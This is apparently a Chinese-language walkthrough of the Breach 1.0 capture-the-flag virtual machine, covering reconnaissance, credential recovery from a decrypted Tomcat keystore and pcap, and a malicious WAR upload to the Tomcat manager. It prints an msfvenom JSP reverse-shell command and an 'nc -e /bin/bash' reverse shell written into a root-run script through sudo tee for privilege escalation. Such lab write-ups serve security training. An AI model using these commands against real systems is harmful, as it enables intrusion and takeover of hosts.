breach1.0 tomcat war远程部署

环境准备

靶机链接：百度网盘请输入提取码

提取码：vq1h

虚拟机网络链接模式：仅主机模式

攻击机系统：kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务

nmap -p- 192.168.110.140

2.用gobuster扫描下目录

gobuster dir -u http://192.168.110.140 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

3.查询网页源码

curl -i -L http://192.168.110.140

4.俩次base64解密后得到 pgibbon:damnitfeel$goodtobeagang$ta

5.访问下扫出的这个目录后，发现一张图片可能存在隐藏信息

http://192.168.110.140/breach.html

6.将图片下载下来，查看隐藏信息

wget http://192.168.110.140/images/bill.png

strings bill.png

coffeestains

漏洞利用

1.访问网页发现一个cms系统

2.尝试登录

用户名：pgibbons

密码：damnitfeel$goodtobeagang$ta

3.查看邮件信息发现KeyStore是一个存储库，可用于存储一系列密钥（Secret Key）、密钥对（Key Pair）或证书

4.随便点后发现content

5.找到一个pcap文件，并且告诉了密码是tomcat

5.用keytool工具对keystore解密

keytool -importkeystore -srckeystore /home/weiqin/下载/keystore -destkeystore /home/weiqin/下载/keystore.p12 -deststoretype pkcs12 -srcalias tomcat

6.将新证书导入到wireshark

7.导入成功就能看到数据

Credentials: tomcat:Tt\5D8F(#!*u=G)4m7zB

https://192.168.110.140:8443/_M@nag3Me/html

8.访问下地址，访问失败，数据是正常的应该能访问到的，用bp抓包，放包来登录；并发现是一个basic认证。

9.用户名密码登录成功

tomcat:Tt\5D8F(#!*u=G)4m7zB

10.登录进去可以上传war包，用msfvenom生成war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > shell1.war

11.成功反弹shell（手速要快，不然会失败）

环境准备

信息收集

漏洞利用

权限提升

1.在家目录下啥也没有发现

2.在网站目录下发现一个5446很奇怪，查看后发现一个php文件。

3.查看发现数据库用户名，密码为空

cat 0d93f85c5061c44cdffeb8381b2772fd.php

4.mysql -uroot -p 成功登录

6.看到一个user表

select * from tables.user;

7.查看后，发现一段密文，用md5解密下。

milton 6450d89bd3aff1d893b85d3ad65d2ec2

8.成功登录milton用户

thelaststraw

9.查看历史执行记录，发现登陆过一个用户blumbergh。

之前在图片中找到的英文就是这个用户密码！

sudo-l 执行后可以不用密码执行下面俩个命令

10.向tidyup.sh中写入反弹shell命令

tidyup.sh文件是root权限，tee命令能够写命令，那么用tee命令写tidyup.sh里。

echo 'nc -e /bin/bash 192.168.110.128 5555' > shell.txt

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

11.反弹shell成功